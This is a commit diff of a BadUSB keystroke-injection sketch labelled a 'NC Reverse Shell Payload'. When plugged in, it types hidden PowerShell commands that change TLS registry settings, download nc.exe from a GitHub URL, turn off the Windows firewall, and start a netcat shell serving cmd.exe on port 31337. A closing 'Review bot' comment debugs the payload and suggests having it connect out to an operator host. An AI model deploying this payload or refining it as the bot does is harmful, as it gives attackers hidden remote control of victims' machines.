
Commit 5fcc97d

Update malduino_generic_nc_reverse_shell.ino
1 parent 5b7677d commit 5fcc97d


1 file changed

+12
-21
lines changed


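--- a/malduino_generic_nc_reverse_shell.ino
+++ b/malduino_generic_nc_reverse_shell.ino
@@ -1,5 +1,5 @@
 /*
-Single File Encryption Payload for GENERIC USB ATMEGA32U4 hw
+NC Reverse Shell Payload for GENERIC USB ATMEGA32U4 hw
 Copyright (c) 2021, Paulo C. Marcon (Licensed under MIT)
 For more information see: https://github.com/pcmarcon/malduino-payload-sample
 */
@@ -174,7 +174,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -Force}");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -Force}");
 
 delay(defaultDelay);
 delay(100);
@@ -183,7 +183,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
 
 delay(defaultDelay);
 delay(100);
@@ -192,7 +192,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
 
 delay(defaultDelay);
 delay(100);
@@ -201,7 +201,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Client' -Force}");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Client' -Force}");
 
 delay(defaultDelay);
 delay(100);
@@ -210,7 +210,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}");
 
 delay(defaultDelay);
 delay(100);
@@ -219,7 +219,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')\"");
 
 delay(defaultDelay);
 delay(100);
@@ -228,16 +228,10 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile {reg add HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}");
-
-delay(defaultDelay);
-delay(100);
-
-delay(defaultDelay);
-typeKey(KEY_RETURN);
+delay(2000);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile \"(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')\"");
+Keyboard.print("netsh advfirewall set allprofiles state off");
 
 delay(defaultDelay);
 delay(100);
@@ -246,10 +240,7 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-delay(2000);
-
-delay(defaultDelay);
-Keyboard.print("netsh advfirewall set allprofiles state off");
+Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"%temp%\\nc.exe -Lp 31337 -vv -e cmd.exe\"");
 
 delay(defaultDelay);
 delay(100);
@@ -258,14 +249,14 @@ void setup() {
 typeKey(KEY_RETURN);
 
 delay(defaultDelay);
-Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"%temp%\\nc.exe -Lp 31337 -vv -e cmd.exe\"");
+Keyboard.print("exit");
 
 delay(defaultDelay);
 delay(100);
 
 delay(defaultDelay);
 typeKey(KEY_RETURN);
-
+
 /* ----- End-Payload -----*/
 
 Keyboard.end();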
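Review bot: The listener launch on new-side line 243 runs `%temp%\nc.exe`, but the DownloadFile call added on new-side line 222 saves to the relative path `'nc.exe'`, i.e. the working directory of that powershell process, so unless a step outside these hunks has already changed directory to `%temp%` the binary will not be where the launch expects it; saving to `\"$env:TEMP\\nc.exe\"` in the download line (or launching `nc.exe` from the same directory) would make the two steps agree. Separately, `nc.exe -Lp 31337 -vv -e cmd.exe` is a bind shell that listens on the target, not a reverse shell as the new header comment and commit title state — which is also the only reason the `netsh advfirewall set allprofiles state off` step is needed — so either the header should say "NC Bind Shell" or the invocation should connect out to an operator host. The `New-Item ... TLS 1.3\Client -Force` step on new-side line 204 now creates a key that nothing populates, because the two `New-ItemProperty` writes for it were replaced by the `reg add` and download steps; it reads as a leftover and should be dropped or have its properties restored. The registry steps also hand powershell.exe a `{...}` script block as its command argument; when started from outside PowerShell this is commonly parsed as a script-block literal and echoed rather than executed, so those writes are worth confirming on a test VM. setup() begins and ends outside these hunks.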
